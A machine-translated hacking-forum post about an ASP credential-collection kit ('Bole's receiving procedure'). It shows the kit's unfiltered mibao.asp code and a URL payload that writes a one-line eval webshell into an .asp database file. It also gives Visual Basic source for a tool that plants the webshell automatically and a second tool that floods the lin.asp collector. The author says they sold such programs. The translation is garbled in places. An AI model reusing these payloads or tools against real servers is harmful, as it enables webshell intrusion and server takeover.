Http://forum.eviloctal.com/thread-32151-1-1.html
Then there are members pm me. Plus, it's been a long time. It's not a secret thing anymore. Maybe it's all over the Internet. Just think about sending things out. It's kind of a study.
Bole's receiving procedure (for previous versions of the old version.)
The primary database name is randomly generated the first time the settings are used. But because he is a universal receiving procedure. Can intercept the secret security.
mibao.asp file does not have any filtering on the submitted parameters
Copy Code code as follows:
If action= "put" then
Sql= "SELECT * from Mibao where u= '" &request ("U") & ""
Set Rs=server.createobject ("ADODB. RecordSet ")
Rs.Open sql,conn,1,3
If Rs.eof Then
Rs.addnew
RS ("U") =request ("U")
RS ("pos") =request ("POS")
RS ("P") = "Wait for crack"
Rs.update
Rs.close
Response.Write "Addok"
Else
sql= "Update Mibao set pos= '" &request ("pos") & "'" & "where u=" "&request (" U ") &" "
Conn.execute (SQL)
Response.Write "Updateok"
End If
End If
At the first line of code
The data submitted by connstr= "Provider = Microsoft.jet.oledb.4.0;data Source =" & Server.MapPath ("mibaoaa.asp") was inserted into the mibaoaa.asp
ASP suffix of the database file. No anti-download processing. Submit a word to the Trojan. It's easy to get Webshell.
Let's say the box address is
Http://127.0.0.1/
On the Visit
Http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request (%22%61%64%22)%25>&mb=3&p= 3
Return to "Addok" on the description of inserting Ma Chenggung
Then
Http://127.0.0.1/mibaoaa.asp visit pony.
The password is ad. Upload the big horse and get Webshell.
According to this vulnerability I used VB to write a simple use of the program.
Program VB source code
Copy Code code as follows:
Private Sub Command1_Click ()
Inet1.openurl (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval Request" (%22%61%64%22)%25>& Mb=3&p=3 ") ' connects Web pages with inet
AA = InStr (inet1.getheader, "404") ' To determine if the page header contains the character ' 404 ', returns 0 is not included, or returns its position
If aa <> 0 Then ' header contains 404
MsgBox "Trojan Insert failed!" ", 48," Failed! "' indicates that the page does not exist
Else ' If the page header does not contain ' 404 '
MsgBox "Trojan Insert success!" ", 64," Congratulations! "' indicates that the page exists
command2.enabled = True
End If
End Sub
Private Sub Command2_Click ()
If Text2.text = Text1.Text + "/mibaoaa.asp" Then
MsgBox "already exists! Please do not repeat this operation! "," error!. "
Else
Text2.text = Text1.Text + "/mibaoaa.asp"
MsgBox "Please use a word trojan customer segment connection!" Password ad! ", 64," Succeeded! "
Text2.visible = True
End If
End Sub
Private Sub Command3_Click ()
End
End Sub
Program and animated demo I also packed and uploaded. The tutorial was done last year. Inside some of the information please look after the brothers do not try again.
In the course of the written contact QQ also don't go to add. At that time because of mixed meal to eat. Sold a few programs.
Now it's all made public. BOLE. RAR (2.5 MB)
In addition, I see some people mentioned in the post brush letter problem. Lin.asp is also not how to filter. can submit data externally
VB Brush Letter Code
Copy Code code as follows:
Private Sub Command1_Click ()
Inet1.openurl (Text1.Text + "/lin.asp?a=" + Text2.text + "&s=" + Text3.text + "&u=" + Text4.text + "&p=" + Tex T5. Text + "&r=" + Text7.text + "&l=" + Text8.text + "&m=" + Text9.text + "&pin=" + text6.text) ' Connect Web page with inet '
AA = InStr (inet1.getheader, "404") ' To determine if the page header contains the character ' 404 ', returns 0 is not included, or returns its position
If aa <> 0 Then ' header contains 404
MsgBox "Brush the letter failed!" The default receipt page may be renamed! ", 48," Failed! "' indicates that the page does not exist
Else ' If the page header does not contain ' 404 '
MsgBox "Brush Letter Success!" Please login to view the background! ", 64," Congratulations! "' indicates that the page exists
End If
End Sub
Private Sub Command2_Click ()
End
End Sub